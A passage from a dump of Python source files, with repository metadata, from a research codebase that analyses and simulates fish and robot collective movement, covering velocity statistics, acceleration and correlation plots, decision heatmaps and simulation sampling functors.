'wb') as f:\n pickle.dump(val[1], f)\n\n with open(self._path + self.test_path + '/' + self.test_filename.replace('{type}', 'inputs') + '.pkl', 'wb') as f:\n pickle.dump(test[0], f)\n\n with open(self._path + self.test_path + '/' + self.test_filename.replace('{type}', 'outputs') + '.pkl', 'wb') as f:\n pickle.dump(test[1], f)\n\n def get_training_path(self):\n return self._path + self.training_path\n\n def get_val_path(self):\n return self._path + self.val_path\n\n def get_test_path(self):\n return self._path + self.test_path\n\n def get_checkpoint_path(self):\n return self._path + self.checkpoint_path\n\n def get_logs_path(self):\n return self._path + self.logs_path\n"
},
{
"alpha_fraction": 0.5812336802482605,
"alphanum_fraction": 0.5881841778755188,
"avg_line_length": 31.885713577270508,
"blob_id": "2bb32493caa6c8e6182994d76727443424fa1494",
"content_id": "f6e4def10075175f79c5aa8897c5f418ab07abc6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1151,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 35,
"path": "/find/simulation/velocity_stat.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.simulation.simu.stat.stat_base import StatBase\n\nimport numpy as np\nfrom pathlib import Path\n\n\nclass VelocityStat(StatBase):\n def __init__(self, dims, filename, dirname='', dump_period=-1):\n super().__init__(filename, dirname, dump_period)\n self._velocities = np.empty((0, dims))\n self._dims = dims\n\n def get_filename(self):\n return self._filename\n\n def get(self):\n return self._velocities\n\n def save(self):\n np.savetxt(Path(self._dirname).joinpath(\n self._filename), self._velocities)\n\n def __call__(self, simu):\n early_dump = self._dump_period > 0 and simu.get_current_iteration() % self._dump_period == 0\n\n if simu.get_num_iterations() == simu.get_current_iteration() + 1 or early_dump:\n appended_vel = np.empty(\n (simu.get_individuals()[0].get_velocity_history().shape[0], 0))\n for ind in simu.get_individuals():\n appended_vel = np.hstack(\n (appended_vel, ind.get_velocity_history()))\n self._velocities = appended_vel\n\n if early_dump:\n self.save()\n"
},
{
"alpha_fraction": 0.5039370059967041,
"alphanum_fraction": 0.5143821239471436,
"avg_line_length": 38.63694381713867,
"blob_id": "8f370281b80e7ac412863bebe88514affe5f7194",
"content_id": "22fa75c0e1a7c9afb4ab3f7559b280acff9e11f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6223,
"license_type": "no_license",
"max_line_length": 176,
"num_lines": 157,
"path": "/find/plots/spatial/resultant_acceleration.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.utils.features import Accelerations, Velocities\nfrom find.utils.utils import compute_leadership\nfrom find.plots.common import *\n\n\ndef compute_resultant_acceleration(data, ax, args):\n lines = ['-', '--', ':']\n linecycler = cycle(lines)\n new_palette = []\n for p in uni_palette():\n new_palette.extend([p, p, p])\n colorcycler = cycle(sns.color_palette(new_palette))\n\n leadership = {}\n for k in sorted(data.keys()):\n p = data[k]['pos']\n v = data[k]['vel']\n leadership[k] = []\n for idx in range(len(p)):\n (_, leadership_timeseries) = compute_leadership(p[idx], v[idx])\n leadership[k].append(leadership_timeseries)\n\n plt.figure(figsize=(5, 5))\n ax = plt.gca()\n labels = []\n for k in sorted(data.keys()):\n if k == 'Hybrid':\n lines = [':']\n linecycler = cycle(lines)\n elif k == 'Virtual':\n lines = ['--']\n linecycler = cycle(lines)\n elif k == 'Real':\n lines = ['-']\n linecycler = cycle(lines)\n\n labels.append(k)\n leaders = leadership[k]\n acc = data[k]['acc']\n leader_dist = []\n follower_dist = []\n\n for idx in range(len(acc)):\n leadership_mat = np.array(leaders[idx])\n num_individuals = acc[idx].shape[1]\n for j in range(num_individuals):\n idx_leaders = np.where(leadership_mat[:, 1] == j)\n leader_dist += acc[idx][idx_leaders, j].tolist()[0]\n follower_idcs = list(range(num_individuals))\n follower_idcs.remove(j)\n for fidx in follower_idcs:\n follower_dist += acc[idx][idx_leaders, fidx].tolist()[0]\n\n print('Accelerations', k)\n print('LF: ', np.mean(leader_dist+follower_dist),\n np.std(leader_dist+follower_dist))\n print('L: ', np.mean(leader_dist),\n np.std(leader_dist))\n print('F: ', np.mean(follower_dist),\n np.std(follower_dist))\n\n ax = sns.kdeplot(leader_dist + follower_dist, ax=ax, color=next(colorcycler),\n linestyle=next(linecycler), label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[0.0, 1.8], bw_adjust=0.15, cut=-1)\n ax = sns.kdeplot(leader_dist, ax=ax, color=next(colorcycler),\n linestyle=next(linecycler), label='Leader (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[0.0, 1.8], bw_adjust=0.15, cut=-1)\n ax = sns.kdeplot(follower_dist, ax=ax, color=next(colorcycler),\n linestyle=next(linecycler), label='Follower (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[0.0, 1.8], bw_adjust=0.15, cut=-1)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {}\n data[e]['pos'] = []\n data[e]['vel'] = []\n data[e]['acc'] = []\n for p in pos:\n positions = np.loadtxt(p) * args.radius\n velocities = Velocities([positions], args.timestep).get()[0]\n accelerations = Accelerations([velocities], args.timestep).get()[0]\n linear_acceleration = np.array((accelerations.shape[0], 1))\n tup = []\n for i in range(accelerations.shape[1] // 2):\n linear_acceleration = np.sqrt(accelerations[:, i * 2] ** 2 + accelerations[:, i * 2 + 1] ** 2\n - 2 * np.abs(accelerations[:, i * 2]) * np.abs(accelerations[:, i * 2 + 1]) * np.cos(\n np.arctan2(accelerations[:, i * 2 + 1], accelerations[:, i * 2]))).tolist()\n tup.append(linear_acceleration)\n data[e]['acc'].append(np.array(tup).T)\n data[e]['pos'].append(positions)\n data[e]['vel'].append(velocities)\n\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n\n ax = compute_resultant_acceleration(data, ax, args)\n\n ax.set_xlabel(r'$\\alpha$ ($m/s^2$)')\n 
ax.set_ylabel('PDF')\n    ax.legend()\n    ax.set_xlim([-0.09, 1.8])\n    plt.savefig(path + 'linear_acceleration.png')\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(\n        description='Resultant acceleration histogram figure')\n    parser.add_argument('--path', '-p', type=str,\n                        help='Path to data directory',\n                        required=True)\n    parser.add_argument('--timestep', '-t', type=float,\n                        help='Timestep',\n                        required=True)\n    parser.add_argument('--radius', '-r', type=float,\n                        help='Radius',\n                        default=0.25,\n                        required=False)\n    parser.add_argument('--kde_gridsize',\n                        type=int,\n                        help='Grid size for kernel density estimation plots',\n                        default=1500,\n                        required=False)\n    parser.add_argument('--type',\n                        nargs='+',\n                        default=['Real', 'Hybrid', 'Virtual'],\n                        choices=['Real', 'Hybrid', 'Virtual'])\n    parser.add_argument('--original_files',\n                        type=str,\n                        default='raw/*processed_positions.dat',\n                        required=False)\n    parser.add_argument('--hybrid_files',\n                        type=str,\n                        default='generated/*generated_positions.dat',\n                        required=False)\n    parser.add_argument('--virtual_files',\n                        type=str,\n                        default='generated/*generated_virtu_positions.dat',\n                        required=False)\n    args = parser.parse_args()\n\n    exp_files = {}\n    for t in args.type:\n        if t == 'Real':\n            exp_files[t] = args.original_files\n        elif t == 'Hybrid':\n            exp_files[t] = args.hybrid_files\n        elif t == 'Virtual':\n            exp_files[t] = args.virtual_files\n\n    plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.49033188819885254,
"alphanum_fraction": 0.5051947832107544,
"avg_line_length": 35.66666793823242,
"blob_id": "2241e53ac65106d0fb3901757ac524fdd9a7565a",
"content_id": "0686a4e966b77e31cd7e731b9508cea5ec260045",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6930,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 189,
"path": "/find/plots/correlation/velocity_correlation.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\nfrom tqdm import tqdm\n\nfrom find.utils.features import Velocities\nfrom find.utils.utils import compute_leadership\nfrom find.plots.common import *\n\n\ndef compute_correlation(data, tcor, ntcor, dtcor, ntcorsup, args):\n cor_l = np.zeros(shape=(ntcorsup, 1))\n cor_f = np.zeros(shape=(ntcorsup, 1))\n ndata = np.ones(shape=(ntcorsup, 1))\n\n for it in range(data[0].shape[0]):\n if (it+1) % 5000 == 0:\n print('At iteration {} out of {}'.format(it+1, data[0].shape[0]))\n for itcor in range(ntcorsup):\n itp = it + itcor * ntcor\n if (itp < data[0].shape[0]):\n cor0 = data[0][it, 1] * data[0][itp, 1] + \\\n data[0][it, 0] * data[0][itp, 0]\n cor_l[itcor] += cor0\n\n cor0 = data[1][it, 1] * data[1][itp, 1] + \\\n data[1][it, 0] * data[1][itp, 0]\n cor_f[itcor] += cor0\n\n ndata[itcor] += 1\n\n return (cor_l, cor_f), ndata\n\n\ndef corv(data, ax, args):\n lines = ['-', '--', ':']\n linecycler = cycle(lines)\n new_palette = uni_palette()\n # new_palette *= 3\n colorcycler = cycle(sns.color_palette(new_palette))\n\n leadership = {}\n for k in sorted(data.keys()):\n p = data[k]['pos']\n v = data[k]['vel']\n leadership[k] = []\n for idx in range(len(p)):\n (_, leadership_timeseries) = compute_leadership(p[idx], v[idx])\n leadership[k].append(leadership_timeseries)\n\n for k in sorted(data.keys()):\n leaders = leadership[k]\n velocities = data[k]['vel']\n leader_velocities = []\n follower_velocities = []\n\n for idx in range(len(velocities)):\n leadership_mat = np.array(leaders[idx])\n lvel = np.copy(velocities[idx][:, :2])\n fvel = np.copy(velocities[idx][:, 2:])\n\n idx_leaders_0 = np.where(leadership_mat[:, 1] == 0)\n idx_leaders_1 = np.where(leadership_mat[:, 1] == 1)\n\n lvel[idx_leaders_0, 0] = velocities[idx][idx_leaders_0, 0]\n lvel[idx_leaders_0, 1] = velocities[idx][idx_leaders_0, 1]\n lvel[idx_leaders_1, 0] = velocities[idx][idx_leaders_1, 2]\n lvel[idx_leaders_1, 1] = velocities[idx][idx_leaders_1, 3]\n\n fvel[idx_leaders_0, 0] = velocities[idx][idx_leaders_0, 2]\n fvel[idx_leaders_0, 1] = velocities[idx][idx_leaders_0, 3]\n fvel[idx_leaders_1, 0] = velocities[idx][idx_leaders_1, 0]\n fvel[idx_leaders_1, 1] = velocities[idx][idx_leaders_1, 1]\n\n leader_velocities.append(lvel)\n follower_velocities.append(fvel)\n\n if k == 'Robot':\n dtcor = args.ntcor * 0.1\n else:\n dtcor = args.ntcor * args.timestep\n ntcorsup = int(args.tcor / dtcor)\n\n cor_l = np.zeros(shape=(ntcorsup, 1))\n cor_f = np.zeros(shape=(ntcorsup, 1))\n ndata = np.ones(shape=(ntcorsup, 1))\n\n for i in tqdm(range(len(velocities)), desc='Processing {}'.format(k), leave=True):\n c, n = compute_correlation(\n (leader_velocities[i], follower_velocities[i]), args.tcor, args.ntcor, dtcor, ntcorsup, args)\n cor_l += c[0]\n cor_f += c[1]\n ndata += n\n\n if k == 'Robot':\n time = np.array(range(ntcorsup)) * 0.1\n else:\n time = np.array(range(ntcorsup)) * args.timestep\n\n ccolour = next(colorcycler)\n ts = (cor_l + cor_f) / (2*ndata)\n ax = sns.lineplot(x=time.tolist(), y=ts.T.tolist()[0], ax=ax, color=ccolour,\n linestyle=next(linecycler), label=k)\n ts = cor_l / ndata\n ax = sns.lineplot(x=time.tolist(), y=ts.T.tolist()[0], ax=ax, color=ccolour,\n linestyle=next(linecycler), label='Leader (' + k + ')')\n ts = cor_f / ndata\n ax = sns.lineplot(x=time.tolist(), y=ts.T.tolist()[0], ax=ax, color=ccolour,\n linestyle=next(linecycler), label='Follower (' + k + ')')\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = 
glob.glob(args.path + '/' + exp_files[e])\n        if len(pos) == 0:\n            continue\n        data[e] = {}\n        data[e]['pos'] = []\n        data[e]['vel'] = []\n        for p in pos:\n            positions = np.loadtxt(p) * args.radius\n            velocities = Velocities([positions], args.timestep).get()[0]\n            data[e]['pos'].append(positions)\n            data[e]['vel'].append(velocities)\n\n    _ = plt.figure(figsize=(5, 5))\n    ax = plt.gca()\n\n    ax = corv(data, ax, args)\n\n    ax.set_xlabel('$t$ (s)')\n    ax.set_ylabel(r'$<V(t) \\cdot V(0)>$')\n    ax.legend()\n    plt.savefig(path + 'corv.png')\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(\n        description='Velocity correlation figure')\n    parser.add_argument('--path', '-p', type=str,\n                        help='Path to data directory',\n                        required=True)\n    parser.add_argument('--timestep', '-t', type=float,\n                        help='Timestep',\n                        required=True)\n    parser.add_argument('--radius', '-r', type=float,\n                        help='Radius',\n                        default=0.25,\n                        required=False)\n    parser.add_argument('--tcor',\n                        type=float,\n                        default=25.0,\n                        help='Time window to consider when computing correlation metrics',\n                        required=False)\n    parser.add_argument('--ntcor',\n                        type=int,\n                        default=1,\n                        help='Number of timesteps to include in the correlation metrics computation',\n                        required=False)\n    parser.add_argument('--type',\n                        nargs='+',\n                        default=['Real', 'Hybrid', 'Virtual'],\n                        choices=['Real', 'Hybrid', 'Virtual'])\n    parser.add_argument('--original_files',\n                        type=str,\n                        default='raw/*processed_positions.dat',\n                        required=False)\n    parser.add_argument('--hybrid_files',\n                        type=str,\n                        default='generated/*generated_positions.dat',\n                        required=False)\n    parser.add_argument('--virtual_files',\n                        type=str,\n                        default='generated/*generated_virtu_positions.dat',\n                        required=False)\n    args = parser.parse_args()\n\n    exp_files = {}\n    for t in args.type:\n        if t == 'Real':\n            exp_files[t] = args.original_files\n        elif t == 'Hybrid':\n            exp_files[t] = args.hybrid_files\n        elif t == 'Virtual':\n            exp_files[t] = args.virtual_files\n\n    plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.46389904618263245,
"alphanum_fraction": 0.4964533746242523,
"avg_line_length": 34.81016159057617,
"blob_id": "b180d92bf83dbe70ad4a8ddb8a0e15d46dafd9fb",
"content_id": "cb64a884abb2603f0b10e3d6d2ff916ee7ba30ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13393,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 374,
"path": "/find/plots/trajectory_visualisation/plot_decision_heatmap_multi.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom utils.losses import *\nimport tensorflow as tf\nfrom PIL import Image\nfrom matplotlib.colors import ListedColormap\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\nimport seaborn as sns\nimport numpy as np\nimport argparse\nimport tqdm\nimport glob\nimport os\nimport matplotlib\n\nmatplotlib.use('Agg')\n\n\nplt.style.use('dark_background')\n\niradius = 0.655172413793\noradius = 1.0\ncenter = (0, 0)\nradius = (iradius, oradius)\n\n# if args.dark:\nimage_path = os.getcwd() + '/plots/fish_dark.png'\n# else:\n# image_path = os.getcwd() + '/plots/fish.png'\nimage = Image.open(image_path)\nimage_path = os.getcwd() + '/plots/excluded.png'\nexcluded_image = Image.open(image_path)\nimage_path = os.getcwd() + '/plots/excluded_t_1.png'\nexcluded_image_t_1 = Image.open(image_path)\nimage_path = os.getcwd() + '/plots/robot.png'\nrimage = Image.open(image_path)\n\n\ndef angle_to_pipi(dif):\n while True:\n if dif < -np.pi:\n dif += 2. * np.pi\n if dif > np.pi:\n dif -= 2. * np.pi\n if (np.abs(dif) <= np.pi):\n break\n return dif\n\n\nclass CircularCorridor:\n def __init__(self, radius=1.0, center=(0, 0)):\n self._center = center\n self._radius = radius\n\n def is_valid(self, radius):\n return radius < self._radius and radius > 0\n\n def center(self):\n return self._center\n\n\ndef cart_sim(model, setup, args):\n global radius, center\n\n inputs = None\n outputs = None\n p = np.loadtxt(args.reference)\n v = np.loadtxt(args.reference.replace('positions', 'velocities'))\n assert p.shape == v.shape, 'Dimensions don\\'t match'\n\n pos_t = np.roll(p, shift=1, axis=0)[2:, :]\n pos_t_1 = np.roll(p, shift=1, axis=0)[1:-1, :]\n vel_t = np.roll(v, shift=1, axis=0)[2:, :]\n vel_t_1 = np.roll(v, shift=1, axis=0)[1:-1, :]\n\n if args.iterations < 0:\n iters = p.shape[0]\n else:\n iters = args.iterations\n\n bins = 1000\n m_y, m_x = np.meshgrid(np.linspace(center[0] - (oradius + 0.0001),\n center[0] + (oradius + 0.0001), bins),\n np.linspace(center[1] - (oradius + 0.0001),\n center[1] + (oradius + 0.0001), bins))\n r = np.sqrt((m_x - center[0]) ** 2 + (m_y - center[1]) ** 2)\n outside_els = np.sum(r > radius[1])\n\n for t in tqdm.tqdm(range(iters)):\n fig = plt.figure(figsize=(6, 7))\n ax = plt.gca()\n\n radius = (iradius, oradius)\n if args.dark:\n color = 'white'\n else:\n color = 'black'\n inner = plt.Circle(\n center, radius[0], color=color, fill=False)\n outer = plt.Circle(\n center, radius[1], color=color, fill=False)\n ax.add_artist(outer)\n\n z = np.zeros([bins, bins])\n\n for fidx in range(p.shape[1] // 2):\n X = []\n X.append(pos_t_1[t, fidx * 2])\n X.append(pos_t_1[t, fidx * 2 + 1])\n X.append(vel_t_1[t, fidx * 2])\n X.append(vel_t_1[t, fidx * 2 + 1])\n\n Y = []\n Y.append(vel_t[t, fidx * 2])\n Y.append(vel_t[t, fidx * 2 + 1])\n\n for nidx in range(p.shape[1] // 2):\n if nidx == fidx:\n continue\n X.append(pos_t_1[t, nidx * 2])\n X.append(pos_t_1[t, nidx * 2 + 1])\n X.append(vel_t_1[t, nidx * 2])\n X.append(vel_t_1[t, nidx * 2 + 1])\n\n X = np.array([X])\n Y = np.array([Y])\n\n prediction = np.array(model.predict(X))\n\n def logbound(val, max_logvar=0, min_logvar=-10):\n logsigma = max_logvar - \\\n np.log(np.exp(max_logvar - val) + 1)\n logsigma = min_logvar + \\\n np.log(np.exp(logsigma - min_logvar) + 1)\n return logsigma\n\n prediction[0, 2:] = list(map(logbound, prediction[0, 2:]))\n prediction[0, 2:] = list(map(np.exp, prediction[0, 2:]))\n\n for _ in range(args.sample_size):\n sample_velx = np.random.normal(\n prediction[0, 0], prediction[0, 2], 
1)[0]\n sample_vely = np.random.normal(\n prediction[0, 1], prediction[0, 3], 1)[0]\n\n x_hat = pos_t_1[t, fidx * 2] + sample_velx * args.timestep\n y_hat = pos_t_1[t, fidx * 2 + 1] + sample_vely * args.timestep\n\n dist_x = np.abs(np.array(x_hat - m_x[:, 0]))\n dist_y = np.abs(np.array(y_hat - m_y[0, :]))\n min_xidx = np.argmin(dist_x)\n min_yidx = np.argmin(dist_y)\n z[min_xidx, min_yidx] += 1\n\n if not args.fish_like:\n ax.add_artist(plt.Circle(\n (pos_t_1[t, fidx * 2], pos_t_1[t, fidx * 2 + 1]), 0.01, color='white', fill=False))\n ax.add_artist(plt.Circle(\n (pos_t[t, fidx * 2], pos_t[t, fidx * 2 + 1]), 0.01, color='green', fill=False))\n\n if args.fish_like:\n phi = np.arctan2(vel_t_1[t, fidx * 2 + 1],\n vel_t_1[t, fidx * 2]) * 180 / np.pi\n rotated_img = image.rotate(phi)\n ax.imshow(rotated_img, extent=[pos_t_1[t, fidx * 2] - 0.05, pos_t_1[t, fidx * 2] + 0.05, pos_t_1[t, fidx * 2 + 1] -\n 0.05, pos_t_1[t, fidx * 2 + 1] + 0.05], aspect='equal', zorder=1)\n\n z /= (iters * (p.shape[1] // 2))\n z_min, z_max = 0, 0.0011\n\n palette = sns.color_palette('RdYlBu_r', 1000)\n palette = [(0, 0, 0, 0)] + palette\n sns.set_palette(palette)\n palette = sns.color_palette()\n cmap = ListedColormap(palette.as_hex())\n\n c = ax.pcolormesh(m_x, m_y, z, cmap=cmap, vmin=z_min, vmax=z_max)\n fig.colorbar(c, ax=ax, label='Cell occupancy (%)',\n orientation='horizontal', pad=0.05)\n\n # ax.axis('off')\n ax.set_xlim([-1.1, 1.1])\n ax.set_ylim([-1.1, 1.1])\n plt.tight_layout()\n png_fname = args.out_dir + '/' + str(t).zfill(6)\n plt.savefig(\n str(png_fname) + '.png',\n transparent=True,\n dpi=300\n )\n plt.close('all')\n\n\ndef polar_sim(model, setup, args):\n global radius, center\n\n inputs = None\n outputs = None\n p = np.loadtxt(args.reference)\n vel = np.loadtxt(args.reference.replace('positions', 'velocities'))\n timestep = args.timestep\n\n pos_t = np.roll(p, shift=1, axis=0)[2:, :]\n rad_t = np.sqrt((pos_t[:, 0] - setup.center()[0]) **\n 2 + (pos_t[:, 1] - setup.center()[1]) ** 2)\n\n pos_t_1 = np.roll(p, shift=1, axis=0)[1:-1, :]\n rad_t_1 = np.sqrt((pos_t_1[:, 0] - setup.center()[0])\n ** 2 + (pos_t_1[:, 1] - setup.center()[1]) ** 2)\n\n vel_t = (p - np.roll(p, shift=1, axis=0))[2:, :] / timestep\n radial_vel_t = (pos_t[:, 0] * vel_t[:, 1] - pos_t[:, 1]\n * vel_t[:, 0]) / (pos_t[:, 0] ** 2 + pos_t[:, 1] ** 2)\n hdg_t = np.array(\n list(map(angle_to_pipi, np.arctan2(vel_t[:, 1], vel_t[:, 0]))))\n\n vel_t_1 = (p - np.roll(p, shift=1, axis=0))[1:-1, :] / timestep\n radial_vel_t_1 = (pos_t_1[:, 0] * vel_t_1[:, 1] - pos_t_1[:, 1]\n * vel_t_1[:, 0]) / (pos_t_1[:, 0] ** 2 + pos_t_1[:, 1] ** 2)\n hdg_t_1 = np.array(\n list(map(angle_to_pipi, np.arctan2(vel_t_1[:, 1], vel_t_1[:, 0]))))\n\n X = np.array([rad_t_1, np.cos(hdg_t_1), np.sin(\n hdg_t_1), vel_t_1[:, 0], vel_t_1[:, 1]])\n Y = np.array([(rad_t-rad_t_1) / timestep, radial_vel_t])\n inputs = X\n outputs = Y\n\n X = X.transpose()\n Y = Y.transpose()\n\n if args.iterations < 0:\n iters = p.shape[0]\n else:\n iters = args.iterations\n\n bins = 1000\n m_y, m_x = np.meshgrid(np.linspace(center[0] - (oradius + 0.0001),\n center[0] + (oradius + 0.0001), bins),\n np.linspace(center[1] - (oradius + 0.0001),\n center[1] + (oradius + 0.0001), bins))\n r = np.sqrt((m_x - center[0]) ** 2 + (m_y - center[1]) ** 2)\n outside_els = np.sum(r > radius[1])\n\n for t in tqdm.tqdm(range(iters)):\n fig = plt.figure(figsize=(6, 7))\n ax = plt.gca()\n\n radius = (iradius, oradius)\n if args.dark:\n color = 'white'\n else:\n color = 'black'\n inner = plt.Circle(\n center, 
radius[0], color=color, fill=False)\n outer = plt.Circle(\n center, radius[1], color=color, fill=False)\n ax.add_artist(outer)\n\n z = np.zeros([bins, bins])\n\n prediction = np.array(model.predict(X[t].reshape(1, X.shape[1])))\n\n def logbound(val, max_logvar=0, min_logvar=-10):\n logsigma = max_logvar - \\\n np.log(np.exp(max_logvar - val) + 1)\n logsigma = min_logvar + np.log(np.exp(logsigma - min_logvar) + 1)\n return logsigma\n\n prediction[0, 2:] = list(map(logbound, prediction[0, 2:]))\n prediction[0, 2:] = list(map(np.exp, prediction[0, 2:]))\n\n for _ in range(args.sample_size):\n sample_velx = np.random.normal(\n prediction[0, 0], prediction[0, 2], 1)[0]\n sample_vely = np.random.normal(\n prediction[0, 1], prediction[0, 3], 1)[0]\n\n x_hat = pos_t_1[t, 0] + sample_velx * args.timestep\n y_hat = pos_t_1[t, 1] + sample_vely * args.timestep\n\n dist_x = np.abs(np.array(x_hat - m_x[:, 0]))\n dist_y = np.abs(np.array(y_hat - m_y[0, :]))\n min_xidx = np.argmin(dist_x)\n min_yidx = np.argmin(dist_y)\n z[min_xidx, min_yidx] += 1\n\n z /= iters\n z_min, z_max = 0, 0.0011\n\n if not args.fish_like:\n ax.add_artist(plt.Circle(\n (pos_t_1[t, 0], pos_t_1[t, 1]), 0.01, color='white', fill=False))\n ax.add_artist(plt.Circle(\n (pos_t[t, 0], pos_t[t, 1]), 0.01, color='green', fill=False))\n\n if args.fish_like:\n phi = np.arctan2(vel[t, 1], vel[t, 0]) * 180 / np.pi\n rotated_img = image.rotate(phi)\n ax.imshow(rotated_img, extent=[pos_t_1[t, 0] - 0.03, pos_t_1[t, 0] + 0.03, pos_t_1[t, 1] -\n 0.03, pos_t_1[t, 1] + 0.03], aspect='equal', zorder=1)\n\n palette = sns.color_palette('RdYlBu_r', 1000)\n palette = [(0, 0, 0, 0)] + palette\n sns.set_palette(palette)\n palette = sns.color_palette()\n cmap = ListedColormap(palette.as_hex())\n\n c = ax.pcolormesh(m_x, m_y, z, cmap=cmap, vmin=z_min, vmax=z_max)\n fig.colorbar(c, ax=ax, label='Cell occupancy (%)',\n orientation='horizontal', pad=0.05)\n\n # ax.axis('off')\n ax.set_xlim([-1.1, 1.1])\n ax.set_ylim([-1.1, 1.1])\n plt.tight_layout()\n png_fname = args.out_dir + '/' + str(t).zfill(6)\n plt.savefig(\n str(png_fname) + '.png',\n transparent=True,\n dpi=300\n )\n plt.close('all')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Visualize the decision heatmap for probabilistic models')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--reference', '-r', type=str,\n help='Path to a reference experiment position file',\n required=True)\n parser.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--polar', action='store_true',\n help='Use polar inputs instead of cartesian coordinates',\n default=False)\n parser.add_argument('--model', '-m', type=str,\n help='Model file name to use',\n required=True)\n parser.add_argument('--iterations', '-i', type=int,\n help='Number of iteration of the simulation',\n required=False,\n default=-1)\n parser.add_argument('--sample-size', '-s', type=int,\n help='Samples to draw for the velocity distribution',\n required=False,\n default=1000)\n parser.add_argument('--dark', action='store_true',\n help='Render dark friendly icons',\n default=False)\n parser.add_argument('--out-dir', '-o', type=str,\n help='Output directory name',\n required=True)\n parser.add_argument('--fish-like', action='store_true',\n help='Images instead of points',\n default=False)\n args = parser.parse_args()\n\n model = tf.keras.models.load_model(Path(args.path).joinpath(args.model + 
'_model.h5'), custom_objects={\n 'gaussian_nll': gaussian_nll, 'gaussian_mse': gaussian_mse, 'gaussian_mae': gaussian_mae})\n setup = CircularCorridor()\n\n if not os.path.exists(args.out_dir):\n os.makedirs(args.out_dir)\n\n if not args.polar:\n cart_sim(model, setup, args)\n else:\n polar_sim(model, setup, args)\n"
},
{
"alpha_fraction": 0.5033050775527954,
"alphanum_fraction": 0.5222800970077515,
"avg_line_length": 34.62049865722656,
"blob_id": "0b4b1bcc2cdb886894789222252e9c0113789000",
"content_id": "857521b8f4c483ddcb7b0e2507a68ac4672ae947",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12859,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 361,
"path": "/find/simulation/tf_nn_functors.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom random import shuffle\nfrom find.models.tf_losses import logbound\n\n\nclass CircularCorridor:\n def __init__(self, radius=1.0, center=(0, 0)):\n self._center = center\n self._radius = radius\n\n def radius(self, position):\n return np.sqrt((position[0] - self._center[0]) ** 2 + (position[1] - self._center[1]) ** 2)\n\n def is_valid(self, radius):\n return radius < self._radius and radius > 0\n\n def center(self):\n return self._center\n\n\nsetup = CircularCorridor()\n\n\ndef _sample_valid_position(position, velocity, prediction, timestep, args):\n failed = 0\n (x_hat, y_hat) = (None, None)\n\n while True:\n g_x = np.random.normal(\n prediction[0, 0], prediction[0, 2] * args.var_coef, 1)[0]\n g_y = np.random.normal(\n prediction[0, 1], prediction[0, 3] * args.var_coef, 1)[0]\n\n vx_hat = velocity[0] + g_x\n vy_hat = velocity[1] + g_y\n x_hat = position[0] + vx_hat * timestep\n y_hat = position[1] + vy_hat * timestep\n r = np.sqrt((x_hat - setup.center()[0])\n ** 2 + (y_hat - setup.center()[1]) ** 2)\n dist = np.sqrt((x_hat - position[0])\n ** 2 + (y_hat - position[1]) ** 2)\n\n # if setup.is_valid(r): # and dist <= args.body_len / 2:\n if setup.is_valid(r) and dist <= 0.2:\n return np.array([x_hat, y_hat])\n else:\n failed += 1\n if failed > 999:\n prediction[:, 2] += 0.01\n prediction[:, 3] += 0.01\n\n\nclass ClosestIndividual:\n def __init__(self, args):\n self._args = args\n\n def sort(self, focal_id, individuals, simu):\n focal_idx = None\n for i, ind in enumerate(individuals):\n if ind.get_id() == focal_id:\n focal_idx = i\n break\n\n distance = []\n fpos = individuals[focal_id].get_position()\n for ind in individuals:\n pos = ind.get_position()\n distance.append(np.sqrt((pos[0] - fpos[0])\n ** 2 + (pos[1] - fpos[1]) ** 2))\n ind_idcs = [x for _, x in sorted(\n zip(distance, list(range(len(individuals)))))]\n ind_idcs.remove(focal_idx)\n\n return ind_idcs\n\n def select(self, focal_id, predictions, simu):\n return predictions[0]\n\n\nclass ShuffledIndividuals:\n def __init__(self, args):\n self._args = args\n\n def sort(self, focal_id, individuals, simu):\n ind_ids = list(range(len(individuals)))\n focal_idx = None\n for i, ind in enumerate(individuals):\n if ind.get_id() == focal_id:\n focal_idx = i\n break\n ind_ids.remove(focal_idx)\n shuffle(ind_ids)\n return ind_ids\n\n def select(self, focal_id, predictions, simu):\n pass\n\n\nclass HighestAcceleration:\n def __init__(self, args):\n self._args = args\n\n def sort(self, focal_id, individuals, simu):\n ind_ids = list(range(len(individuals)))\n focal_idx = None\n for i, ind in enumerate(individuals):\n if ind.get_id() == focal_id:\n focal_idx = i\n break\n ind_ids.remove(focal_idx)\n return 